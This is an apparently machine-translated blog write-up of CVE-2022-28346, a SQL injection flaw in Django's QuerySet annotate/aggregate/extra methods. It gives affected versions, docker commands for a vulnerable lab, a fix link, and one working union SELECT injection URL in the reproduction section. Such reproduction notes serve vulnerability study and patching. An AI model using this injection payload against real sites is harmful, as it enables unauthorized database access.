当前位置:网站首页>Cve-2022-28346: Django SQL injection vulnerability
Cve-2022-28346: Django SQL injection vulnerability
2022-07-08 00:41:00 【yggcwhat】
0x01 brief introduction
Django Yes, it is Python Developed a free open source Web frame , It almost covers Web Every aspect of application , Can be used to quickly build high performance 、 Elegant website ,Django It provides many modules often used in website background development , Enable developers to focus on the business part .
0x02 Summary of vulnerability
Hole number :CVE-2022-28346
Attackers use a carefully crafted dictionary , adopt **kwargs Pass to QuerySet.annotate()、aggregate() and extra() These methods , This can cause these methods to be affected by SQL Injection attack .
0x03 Affects version
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 Environment building
docker pull s0cke3t/cve-2022-28346:latestdocker run -d -p 8080:8000 s0cke3t/cve-2022-28346
0x05 Loophole recurrence
You can find out which interfaces exist through the error reporting page
If the access interface has parameters , The error message will also be prompted
Use the parameters of the error prompt sql Inject
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
0x06 Repair method
The Security version has been officially released , Download address :
https://www.djangoproject.com/download/
边栏推荐
- 华为交换机S5735S-L24T4S-QA2无法telnet远程访问
- 攻防世界Web进阶区unserialize3题解
- Cascade-LSTM: A Tree-Structured Neural Classifier for Detecting Misinformation Cascades(KDD20)
- Operating system principle --- summary of interview knowledge points
- 备库一直有延迟,查看mrp为wait_for_log,重启mrp后为apply_log但过一会又wait_for_log
- Application practice | the efficiency of the data warehouse system has been comprehensively improved! Data warehouse construction based on Apache Doris in Tongcheng digital Department
- Thinkphp内核工单系统源码商业开源版 多用户+多客服+短信+邮件通知
- [OBS] the official configuration is use_ GPU_ Priority effect is true
- 快速上手使用本地测试工具postman
- 【obs】官方是配置USE_GPU_PRIORITY 效果为TRUE的
猜你喜欢
Development of a horse tourism website (optimization of servlet)
The underlying principles and templates of new and delete
深潜Kotlin协程(二十二):Flow的处理
Binder核心API
C# 泛型及性能比较
Application practice | the efficiency of the data warehouse system has been comprehensively improved! Data warehouse construction based on Apache Doris in Tongcheng digital Department
基于微信小程序开发的我最在行的小游戏
8道经典C语言指针笔试题解析
52歲的周鴻禕,還年輕嗎?
【obs】官方是配置USE_GPU_PRIORITY 效果为TRUE的
随机推荐
51 communicates with the Bluetooth module, and 51 drives the Bluetooth app to light up
詹姆斯·格雷克《信息简史》读后感记录
备库一直有延迟,查看mrp为wait_for_log,重启mrp后为apply_log但过一会又wait_for_log
Application practice | the efficiency of the data warehouse system has been comprehensively improved! Data warehouse construction based on Apache Doris in Tongcheng digital Department
[programming problem] [scratch Level 2] 2019.09 make bat Challenge Game
Kubernetes Static Pod (静态Pod)
Tapdata 的 2.0 版 ,开源的 Live Data Platform 现已发布
5g NR system messages
Where is the big data open source project, one-stop fully automated full life cycle operation and maintenance steward Chengying (background)?
Codeforces Round #804 (Div. 2)(A~D)
An error is reported during the process of setting up ADG. Rman-03009 ora-03113
tourist的NTT模板
Reentrantlock fair lock source code Chapter 0
How to add automatic sorting titles in typora software?
深潜Kotlin协程(二十三 完结篇):SharedFlow 和 StateFlow
《因果性Causality》教程,哥本哈根大学Jonas Peters讲授
[Yugong series] go teaching course 006 in July 2022 - automatic derivation of types and input and output
Zhou Hongqi, 52 ans, est - il encore jeune?
Prompt configure: error: required tool not found: libtool solution when configuring and installing crosstool ng tool
[programming questions] [scratch Level 2] March 2019 garbage classification